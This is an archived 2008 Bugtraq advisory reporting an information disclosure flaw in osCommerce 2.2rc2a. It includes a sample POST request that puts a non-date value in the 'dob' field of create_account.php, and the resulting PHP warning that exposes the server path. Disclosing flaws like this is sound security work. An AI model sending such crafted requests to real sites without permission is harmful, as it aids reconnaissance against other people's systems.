lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <47C2B4AA2FF640E798E039CC603957F2@techiese645ed2>
Date: Tue, 16 Sep 2008 21:43:38 +0100
From: "John Cobb" <johnc@...ytes.com>
To: <bugtraq@...urityfocus.com>
Subject: [NOBYTES.COM: #12] osCommerce 2.2rc2a - Information Disclosure

Application:		osCommerce 2.2rc2a
Authors Site:		http://www.oscommerce.com/

+--------------------------------------------------------------+

Information Disclosure:

Manipulation of the 'DOB' Variable on create_account.php can cause
information disclosure:


In this example the POST variable 'DOB' has been set to: FOOBAR

POST /oscommerce/create_account.php

action=process&gender=m&firstname=john&lastname=smith&dob=FOOBAR&email_addre
ss=email@...ress.com&company=foobar&street_address=foobar&suburb=foobar&post
code=foobar&city=foobar&state=foobar&country=1&telephone1=123456789&fax=1234
56789&newsletter=on&password=foobar&confirmation=foobar

Result:

Warning: checkdate() expects parameter 3 to be long, string given in
/var/www/oscommerce/create_account.php on line 80


+-[Notes:]-----------------------------------------------------+

Vulnerabilities found on: 05/09/2008
Author(s) Informed on: 06/09/2008
Author(s) Response: None Yet
Author(s) Fix: None Yet


JohnC@...ytes.com

http://www.NoBytes.com



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ